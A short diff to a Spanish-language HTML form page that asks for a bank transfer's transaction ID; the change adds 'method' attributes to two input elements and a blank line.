--- a/sexion4.html
+++ b/sexion4.html
@@ -29,13 +29,14 @@
             <h2>3-Luego de Hacer la Transferencia Coloque el ID de la Transacción y oprima siguiente</h2>
         </div>
         <div class="form_section1">   
-            <input type="text" placeholder="Transaction ID" required="required" name="ID-5$">
+            <input type="text" placeholder="Transaction ID" required="required" name="ID-5$" method="POST">
         </div>
         <div class="form_section2">
-            <input id="enviar" type="submit" value="Siguiente">
+            <input id="enviar" type="submit" value="Siguiente" method="POST">
         </div>
         <input type="hidden" name="_next" value="sexion6.html">    
         <input type="hidden" name="_captcha" value="false">     
     </form>
 </body>
+
 </html>
